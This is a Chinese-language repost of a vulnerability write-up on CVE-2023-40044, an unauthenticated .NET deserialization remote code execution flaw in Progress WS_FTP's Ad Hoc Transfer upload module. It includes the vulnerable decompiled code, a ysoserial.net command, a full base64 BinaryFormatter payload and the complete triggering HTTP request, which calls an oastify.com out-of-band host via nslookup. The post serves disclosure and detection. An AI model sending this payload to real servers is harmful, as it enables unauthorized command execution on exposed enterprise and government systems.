正在进行中的 RCE 通过 IIS HTTP 模块进行 WS_FTP Ad Hoc (CVE-2023-40044)

渗透技巧 7个月前 admin
118 0 0



正在进行中的 RCE 通过 IIS HTTP 模块进行 WS_FTP Ad Hoc (CVE-2023-40044)

在过去一年左右的时间里,我们看到了托管文件传输软件的大规模利用。来自 GoAnywhere MFT、MOVEIt 以及我们自己在Citrix Sharefile上的工作。最近,Cl0p 利用 Progress MOVEIt 中的一系列漏洞发起勒索软件攻击,通过托管文件传输软件对企业造成的威胁真正击中要害。


在查看我们的一个目标攻击面时,我们遇到了另一种名为 WS_FTP 的托管文件传输软件。该软件由 Progress 开发,该公司还创建了 MOVEIt 文件传输软件。我们可以通过以下 URL 轻松下载该软件的副本(通过注册试用版):

https://aws.ipswitch.com/?SERIAL=A295P8XCUE7PVFD&UAP=NNSV5DM4&PATH=/ft/WS_FTP/Server/2022.0.1/WS_FTP_Server-2022.0.1.exe

安装软件并使用 ILSpy 反编译源代码后,我们像往常一样开始绘制攻击面的过程。这个特殊的漏洞是从接收器 -> 源中发现的,我们在其中发现了反序列化接收器并向上找到源。


最终,我们发现该漏洞无需任何身份验证即可触发,并且影响了 WS_FTP 的整个 Ad Hoc Transfer 组件。令人有点震惊的是,我们能够在没有任何身份验证的情况下到达反序列化接收器。


关于 IIS HTTP 模块

IIS HTTP 模块允许开发人员在 HTTP 请求的生命周期内运行代码。HTTP 模块的约定类似于您可能在其他 Web 应用程序框架中看到的“中间件”。


Progress WS_FTP 中发现的问题位于名为MyFileUpload.UploadModule 的HTTP 模块中。此 HTTP 模块负责AHT 应用程序内进行的所有文件上传。看到所有文件上传功能都在 HTTP 模块内实现是很疯狂的,因为我们作为工程师相信 HTTP 模块不应该负责文件上传功能(特别是考虑到 HTTP 模块几乎在每个请求周期上运行)。


HTTP 模块的web.config条目如下所示:

 <httpModules>     <add name="extend_session_module" type="AHT.Main.ExtendUserSessionModule" />     <add name="upload_module" type="MyFileUpload.UploadModule, fileuploadlibrary, Version=4.0.0.0" />   </httpModules>

IIS HTTP 模块的文档有助于理解如何触发MyFileUpload.UploadModule中的不同函数[1]。


技术细节

如上所示,模块MyFileUpload.UploadModule是在web.config中声明的。该模块负责 AHT 应用程序内的动态文件上传功能。这是通过确定请求是否是文件上传请求然后对输入数据执行某些操作(如果是)来实现的。


我们可以按照下面的源码来解决反序列化问题。我们将首先查看位于FileUploadLibrary/MyFileUpload/UploadModule.cs的文件。


文件首先确定请求是否是文件上传请求(多部分)。根据这一点,它设置会话状态行为。如果我们确实发送了有效的分段文件上传请求,我们最终会得到以下代码行:

using FormStream formStream = new FormStream(GetProcessor(), boundary, httpApplication.Request.ContentEncoding);

进入位于FileUploadLibrary/MyFileUpload/FormStream.cs的 FormStream 代码,我们确定需要访问“ProcessField”函数。为了做到这一点,我们必须制作一个多部分有效负载,其中不包含文件名,而只包含名称字段。


在ProcessField函数中,我们需要访问CheckForActionFields。通过动态调试,我们能够确认我们的多部分请求到达了CheckForActionFields


ProcessField调用CheckForActionFields函数,该函数最终调用UploadManager.Instance.DeserializeProcessor

private void CheckForActionFields(){       byte[] array = _currentField.ToArray();       string result = string.Empty;       int num = IndexOf(array, BOUNDARY);       if (!TryParseActionField(ID_TAG, array, out result, num))       {           string result2 = string.Empty;           if (TryParseActionField(DEFAULT_PARAMS_TAG, array, out result2, num))           {               _defaultProcessor = UploadManager.Instance.DeserializeProcessor(result2.Substring(DEFAULT_PARAMS_TAG.Length));               _processor = _defaultProcessor;               _currentField = new MemoryStream();               return;           }

DeserializeProcessor函数如下:

internal IFileProcessor DeserializeProcessor(string input)    {    BinaryFormatter binaryFormatter = new BinaryFormatter();    byte[] buffer = Convert.FromBase64String(input);    MemoryStream serializationStream = new MemoryStream(buffer);    SettingsStorageObject settingsStorageObject = (SettingsStorageObject)binaryFormatter.Deserialize(serializationStream);

我们确认在调试软件时能够使用我们自己的用户输入来实现此功能,该输入最终会出现在serializationStream变量中:

正在进行中的 RCE 通过 IIS HTTP 模块进行 WS_FTP Ad Hoc (CVE-2023-40044)

为了通过反序列化执行任意命令,我们可以使用 ysoserial.net 并使用以下命令:

./ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "cmd.exe /C nslookup wuui3r1tbpx4pwl6ao5dztkiq9w2ks8h.oastify.com" -o base64

这将生成一个序列化的有效负载,例如:

AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAEMvYyBjbWQuZXhlIC9DIG5zbG9va3VwIHd1dWkzcjF0YnB4NHB3bDZhbzVkenRraXE5dzJrczhoLm9hc3RpZnkuY29tBgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBg0AAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYOAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg8AAAAFU3RhcnQJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhUAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYWAAAAB0NvbXBhcmUJDAAAAAYYAAAADVN5c3RlbS5TdHJpbmcGGQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhoAAAAyU3lzdGVtLkludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEQAAAACAAAAAYbAAAAcVN5c3RlbS5Db21wYXJpc29uYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCQwAAAAKCQwAAAAJGAAAAAkWAAAACgs=

触发 RCE 的最终 HTTP 请求如下:

POST /AHT/AhtApiService.asmx/AuthUser HTTP/2Host: targetCookie: ASP.NET_SessionId=lilzf4yfwobb5fsaelo5abezContent-Length: 3269Access-Control-Allow-Origin: *Accept: application/json, text/plain, */*Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Sec-Ch-Ua-Platform: "macOS"Content-Length: 3269Content-Type: multipart/form-data; boundary=---------------------------9051914041544843365972754266

-----------------------------9051914041544843365972754266Content-Disposition: form-data; name="";
::AHT_DEFAULT_UPLOAD_PARAMETER::AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAEMvYyBjbWQuZXhlIC9DIG5zbG9va3VwIHd1dWkzcjF0YnB4NHB3bDZhbzVkenRraXE5dzJrczhoLm9hc3RpZnkuY29tBgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBg0AAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYOAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg8AAAAFU3RhcnQJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhUAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYWAAAAB0NvbXBhcmUJDAAAAAYYAAAADVN5c3RlbS5TdHJpbmcGGQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhoAAAAyU3lzdGVtLkludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEQAAAACAAAAAYbAAAAcVN5c3RlbS5Db21wYXJpc29uYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCQwAAAAKCQwAAAAJGAAAAAkWAAAACgs=-----------------------------9051914041544843365972754266---

这将导致应用程序成功执行命令cmd.exe /C nslookup wuui3r1tbpx4pwl6ao5dztkiq9w2ks8h.oastify.com


请注意,由于 HTTP 模块的性质,GET URL 可以是 Ad Hoc Transfer 应用程序中的任何路由。这使得 WAF 检测它们是否仅依赖于 GET URL 变得有点棘手。需要对请求的内容进行进一步检查,以充分检测漏洞利用和/或保护您的 WS_FTP 实例。


结论

事实证明,该漏洞相对简单,代表了导致 RCE 的典型 .NET 反序列化问题。令人惊讶的是,这个错误已经存在了这么长时间,供应商声称大多数版本的 WS_FTP 都容易受到攻击。


通过对 WS_FTP 的分析,我们发现互联网上大约有 2900 台主机正在运行 WS_FTP(并且其 Web 服务器也暴露,这是利用的必要条件)。这些在线资产大部分属于大型企业、政府和教育机构。


与往常一样,我们的攻击面管理平台的客户是第一个知道此漏洞何时影响他们的人。我们继续进行原创安全研究,努力让客户了解其攻击面中的零日漏洞。




感谢您抽出

正在进行中的 RCE 通过 IIS HTTP 模块进行 WS_FTP Ad Hoc (CVE-2023-40044)

.

正在进行中的 RCE 通过 IIS HTTP 模块进行 WS_FTP Ad Hoc (CVE-2023-40044)

.

正在进行中的 RCE 通过 IIS HTTP 模块进行 WS_FTP Ad Hoc (CVE-2023-40044)

来阅读本文

正在进行中的 RCE 通过 IIS HTTP 模块进行 WS_FTP Ad Hoc (CVE-2023-40044)

点它,分享点赞在看都在这里


原文始发于微信公众号(Ots安全):正在进行中的 RCE 通过 IIS HTTP 模块进行 WS_FTP Ad Hoc (CVE-2023-40044)

版权声明:admin 发表于 2023年10月1日 下午6:06。
转载请注明:正在进行中的 RCE 通过 IIS HTTP 模块进行 WS_FTP Ad Hoc (CVE-2023-40044) | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...